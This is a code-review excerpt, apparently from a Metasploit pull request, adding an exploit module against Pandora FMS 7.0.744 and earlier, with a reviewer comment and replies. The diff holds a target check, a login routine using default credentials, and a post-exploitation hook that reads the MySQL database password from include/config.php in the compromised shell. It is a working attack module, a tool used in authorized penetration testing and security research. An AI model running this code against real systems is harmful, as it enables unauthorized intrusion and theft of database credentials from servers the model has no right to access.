modules/exploits/linux/http/pandora_fms_events_exec.rb

```diff
@@ -0,0 +1,185 @@
+        },
+        'DefaultTarget' => 0
+      )
+    )
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
+  end
+
+  def check
+    vprint_status('Running check')
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')
+      return CheckCode::Safe('Target is not a Pandora FMS application.')
+    end
+
+    @cookie = res.get_cookies
+    html = res.get_html_document
+    full_version = html.at('div[@id="ver_num"]').text
+
+    unless full_version && (!full_version.to_s.eql? '')
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = full_version[1..-1].gsub!('NG', '')
+
+    unless version && (!version.to_s.eql? '')
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = Gem::Version.new version
+
+    unless version <= Gem::Version.new('7.0.744')
+      return CheckCode::Safe("Target is Pandora FMS with version #{full_version}.")
+    end
+
+    CheckCode::Appears("Target is Pandora FMS with version #{full_version}.")
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as #{user} ..."
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'cookie' => @cookie,
+      'vars_get' => { 'login' => '1' },
+      'vars_post' => {
+        'nick' => user,
+        'pass' => pass,
+        'login_button' => 'Login'
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 302
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    redirect = res.headers['Location']
+
+    unless redirect && redirect.to_s != ''
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => redirect,
+      'cookie' => @cookie
+    })
+
+    unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good "Authenticated as user #{user}."
+  end
+
+  def on_new_session(client)
+    super
+    print_status('Trying to read the MySQL DB password via `cat include/config.php | grep dbpass`. The default privileged user is `root`.')
+    command = 'cat include/config.php | grep dbpass'
+    client.shell_write(command + "\n")
```

Comment:
I believe `shell_command_token` is preferred. Also, you could probably hide these statements unless a password is found.

```suggestion
    print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')
    client.shell_command_token("grep dbpass include/config.php")
```

Reply:
I tried changing this, but then the command isn't executed for some reason, so I left it the way it is.

Reply:
Marking this as resolved. See https://github.com/rapid7/metasploit-framework/pull/13730#discussion_r453135341 for context.